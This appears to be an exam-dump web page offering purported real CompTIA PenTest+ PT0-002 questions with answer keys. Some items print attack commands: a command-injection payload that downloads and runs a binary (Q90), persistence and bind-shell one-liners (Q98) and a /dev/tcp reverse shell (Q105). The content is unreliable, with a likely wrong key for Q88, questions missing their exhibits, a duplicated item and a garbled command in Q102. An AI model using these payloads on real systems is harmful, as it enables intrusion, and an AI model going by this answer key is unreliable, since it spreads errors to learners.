[Q87-Q106] Get 100% Real PT0-002 Accurate & Verified Answers As Seen in the Real Exam!

Share

Get 100% Real PT0-002 Exam Questions, Accurate & Verified Answers As Seen in the Real Exam!

PT0-002 Premium Files Updated Dec-2023 Practice Valid Exam Dumps Question


CompTIA PT0-002 exam is an updated version of the CompTIA PenTest+ certification exam. This new version is designed to meet the latest standards of the cybersecurity industry and is more comprehensive than the previous version. The new exam covers a broader range of technologies, including cloud computing, IoT (Internet of Things) devices, and mobile devices. The updated exam objectives also align with the National Institute of Standards and Technology (NIST) Cybersecurity Framework, which is the standard that many organizations use to protect their systems and networks.

 

NEW QUESTION # 87
A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation?

  • A. Implement multifactor authentication on all corporate applications.
  • B. Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy.
  • C. Implement a recurring cybersecurity awareness education program for all users.
  • D. Implement an email security gateway to block spam and malware from email communications.

Answer: C


NEW QUESTION # 88
A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important dat
a. Which of the following was captured by the testing team?

  • A. User hashes sent over SMB
  • B. IP addresses
  • C. Encrypted file transfers
  • D. Multiple handshakes

Answer: B


NEW QUESTION # 89
A penetration tester, who is doing an assessment, discovers an administrator has been exfiltrating proprietary company information. The administrator offers to pay the tester to keep quiet. Which of the following is the BEST action for the tester to take?

  • A. Escalate the issue.
  • B. Check the scoping document to determine if exfiltration is within scope.
  • C. Include the discovery and interaction in the daily report.
  • D. Stop the penetration test.

Answer: D

Explanation:
Explanation
"Another reason to communicate with the customer is to let the customer know if something unexpected arises while doing the pentest, such as if a critical vulnerability is found on a system, a new target system is found that is outside the scope of the penetration test targets, or a security breach is discovered when doing the penetration test. You will need to discuss how to handle such discoveries and who to contact if those events occur. In case of such events, you typically stop the pentest temporarily to discuss the issue with the customer, then resume once a resolution has been determined."


NEW QUESTION # 90
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS
&loginUser=a&Pwd=a"
exploit += "HTTP/1.1"
Which of the following commands should the penetration tester run post-engagement?

  • A. rm -rf /tmp/apache
  • B. chmod 600 /tmp/apache
  • C. grep -v apache ~/.bash_history > ~/.bash_history
  • D. taskkill /IM "apache" /F

Answer: A


NEW QUESTION # 91
Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in?

  • A. Public and private keys
  • B. HTTPS communication
  • C. Sessions and cookies
  • D. Password encryption

Answer: C


NEW QUESTION # 92
A penetration tester is reviewing the following SOW prior to engaging with a client:
"Network diagrams, logical and physical asset inventory, and employees' names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client's Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner." Based on the information in the SOW, which of the following behaviors would be considered unethical?
(Choose two.)

  • A. Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client's senior leadership team
  • B. Using a software-based erase tool to wipe the client's findings from the penetration tester's laptop
  • C. Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection
  • D. Seeking help with the engagement in underground hacker forums by sharing the client's public IP address
  • E. Retaining the SOW within the penetration tester's company for future use so the sales team can plan future engagements
  • F. Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the engagement

Answer: A,D

Explanation:
Explanation
These two behaviors would be considered unethical because they violate the principles of honesty, integrity, and confidentiality that penetration testers should adhere to. Failing to share critical vulnerabilities with the client would be dishonest and unprofessional, as it would compromise the quality and value of the assessment and potentially expose the client to greater risks. Seeking help in underground hacker forums by sharing the client's public IP address would be a breach of confidentiality and trust, as it would expose the client's identity and information to malicious actors who may exploit them.


NEW QUESTION # 93
A penetration tester utilized Nmap to scan host 64.13.134.52 and received the following results:

Based on the output, which of the following services are MOST likely to be exploited? (Choose two.)

  • A. Telnet
  • B. SNMP
  • C. SMTP
  • D. DNS
  • E. NTP
  • F. HTTP

Answer: D,F


NEW QUESTION # 94
A penetration tester captured the following traffic during a web-application test:

Which of the following methods should the tester use to visualize the authorization information being transmitted?

  • A. Decode the authorization header using UTF-8.
  • B. Decrypt the authorization header using AES.
  • C. Decode the authorization header using Base64.
  • D. Decrypt the authorization header using bcrypt.

Answer: C


NEW QUESTION # 95
A penetration tester captured the following traffic during a web-application test:

Which of the following methods should the tester use to visualize the authorization information being transmitted?

  • A. Decode the authorization header using UTF-8.
  • B. Decrypt the authorization header using AES.
  • C. Decode the authorization header using Base64.
  • D. Decrypt the authorization header using bcrypt.

Answer: C


NEW QUESTION # 96
A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)

  • A. An Nmap scan
  • B. A vulnerability scan
  • C. Open-source research
  • D. A ping sweep
  • E. Port knocking
  • F. Traffic sniffing

Answer: C,F

Explanation:
Explanation
Open-source research and traffic sniffing are two activities that have a minimal chance of detection, as they do not involve sending any packets or requests to the target network or system. Open-source research is the process of gathering information from publicly available sources, such as websites, social media, blogs, forums, etc. Traffic sniffing is the process of capturing and analyzing network packets that are transmitted over a shared medium, such as wireless or Ethernet.


NEW QUESTION # 97
A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?

  • A. The expected time frame of the assessment
  • B. A signed statement of work
  • C. The proper emergency contacts for the client
  • D. The correct user accounts and associated passwords

Answer: B

Explanation:
Explanation
According to the CompTIA PenTest+ Study Guide, Exam PT0-0021, a statement of work (SOW) is a document that defines the scope, objectives, deliverables, and terms of a penetration testing project. It is a formal agreement between the service provider and the client that specifies what is expected from both parties, including the timeline, budget, resources, and responsibilities. A SOW is essential for any penetration testing engagement, as it helps to avoid misunderstandings, conflicts, and legal issues.
The CompTIA PenTest+ Study Guide also provides an example of a SOW template that covers the following sections1:
Project overview: A brief summary of the project's purpose, scope, objectives, and deliverables.
Project scope: A detailed description of the target system, network, or application that will be tested, including the boundaries, exclusions, and assumptions.
Project objectives: A clear statement of the expected outcomes and benefits of the project, such as identifying vulnerabilities, improving security posture, or complying with regulations.
Project deliverables: A list of the tangible products or services that will be provided by the service provider to the client, such as reports, recommendations, or remediation plans.
Project timeline: A schedule of the project's milestones and deadlines, such as kickoff meeting, testing phase, reporting phase, or closure meeting.
Project budget: A breakdown of the project's costs and expenses, such as labor hours, travel expenses, tools, or licenses.
Project resources: A specification of the project's human and technical resources, such as team members, roles, responsibilities, skills, or equipment.
Project terms and conditions: A statement of the project's legal and contractual aspects, such as confidentiality, liability, warranty, or dispute resolution.
The CompTIA PenTest+ Study Guide also explains why having a SOW is important before starting an assessment1:
It establishes a clear and mutual understanding of the project's scope and expectations between the service provider and the client.
It provides a basis for measuring the project's progress and performance against the agreed-upon objectives and deliverables.
It protects both parties from potential risks or disputes that may arise during or after the project.


NEW QUESTION # 98
A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?

  • A. schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe
  • B. sudo useradd -ou 0 -g 0 user
  • C. wmic startup get caption,command
  • D. crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash") | crontab 2>/dev/null

Answer: A


NEW QUESTION # 99
A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

  • A. Edit the smb.conf file and upload it to the server
  • B. Download .pl files and look for usernames and passwords
  • C. Download the smb.conf file and look at configurations
  • D. Edit the discovered file with one line of code for remote callback

Answer: A


NEW QUESTION # 100
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

  • A. Zero-day attacks
  • B. Race-condition attacks
  • C. Buffer overflows
  • D. Cross-site scripting
  • E. Ransomware attacks
  • F. Injection flaws

Answer: D,F

Explanation:
Explanation
A01-Injection
A02-Broken Authentication
A03-Sensitive Data Exposure
A04-XXE
A05-Broken Access Control
A06-Security Misconfiguration
A07-XSS
A08-Insecure Deserialization
A09-Using Components with Known Vulnerabilities
A10-Insufficient Logging & Monitoring


NEW QUESTION # 101
In Python socket programming, SOCK_DGRAM type is:

  • A. reliable.
  • B. slower.
  • C. connectionless.
  • D. matrixed.

Answer: C

Explanation:
Explanation
Connectionless due to the Datagram portion mentioned so that would mean its using UDP.


NEW QUESTION # 102
A penetration tester runs the following command:
l.comptia.local axfr comptia.local
which of the following types of information would be provided?

  • A. The DNSSEC certificate and CA
  • B. The DHCP scopes and ranges used on the network
  • C. The OS and version of the DNS server
  • D. The hostnames and IP addresses of internal systems

Answer: D

Explanation:
Explanation
The command dig @ns1.comptia.local axfr comptia.local is a command that performs a DNS zone transfer, which is a process of copying the entire DNS database or zone file from a primary DNS server to a secondary DNS server. A DNS zone file contains records that map domain names to IP addresses and other information, such as mail servers, name servers, or aliases. A DNS zone transfer can provide useful information for enumeration, such as the hostnames and IP addresses of internal systems, which can help identify potential targets or vulnerabilities. A DNS zone transfer can be performed by using tools such as dig, which is a tool that can query DNS servers and obtain information about domain names, such as IP addresses, mail servers, name servers, or other records1. The other options are not types of information that would be provided by a DNS zone transfer. The DNSSEC certificate and CA are not part of the DNS zone file, but rather part of the DNSSEC protocol, which is an extension of the DNS protocol that provides authentication and integrity for DNS data. The DHCP scopes and ranges used on the network are not part of the DNS zone file, but rather part of the DHCP protocol, which is a protocol that assigns dynamic IP addresses and other configuration parameters to devices on a network. The OS and version of the DNS server are not part of the DNS zone file, but rather part of the OS fingerprinting technique, which is a technique that identifies the OS and version of a remote system by analyzing its responses to network probes.


NEW QUESTION # 103
After gaining access to a previous system, a penetration tester runs an Nmap scan against a network with the following results:

The tester then runs the following command from the previous exploited system, which fails:
Which of the following explains the reason why the command failed?

  • A. The tester input the incorrect IP address.
  • B. The command requires the -port 135 option.
  • C. PowerShell requires administrative privilege.
  • D. An account for RDP does not exist on the server.

Answer: D


NEW QUESTION # 104
A company uses a cloud provider with shared network bandwidth to host a web application on dedicated servers. The company's contact with the cloud provider prevents any activities that would interfere with the cloud provider's other customers. When engaging with a penetration-testing company to test the application, which of the following should the company avoid?

  • A. Crawling the web application's URLs looking for vulnerabilities
  • B. Brute forcing the application's passwords
  • C. Sending many web requests per second to test DDoS protection
  • D. Fingerprinting all the IP addresses of the application's servers

Answer: C


NEW QUESTION # 105
A penetration tester ran the following command on a staging server:
python -m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?

  • A. nc 10.10.51.50 9891 < exploit
  • B. wget 10.10.51.50:9891/exploit
  • C. powershell -exec bypass -f \\10.10.51.50\9891
  • D. bash -i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit

Answer: B


NEW QUESTION # 106
......


CompTIA PT0-002 PenTest+ Certification Exam is a valuable and critically acclaimed certification that verifies the candidate's knowledge and aptitude in performing ethical hacking and other security testing activities. CompTIA PenTest+ Certification certification will enable candidates to showcase their expertise in digital forensics, vulnerability scanning, and penetration testing, which has become a vital task in maintaining safe and secure computer systems, networks, and applications.


The PT0-002 exam is designed for individuals who have a minimum of three to four years of experience in information security or related fields. PT0-002 exam consists of 85 multiple-choice and performance-based questions that are based on four areas of knowledge: planning and scoping, information gathering and vulnerability identification, attacks and exploitation, and reporting and communication. PT0-002 exam duration is 165 minutes, and the passing score is 750 out of 900.

 

REAL PT0-002 Exam Questions With 100% Refund Guarantee : https://realpdf.free4torrent.com/PT0-002-valid-dumps-torrent.html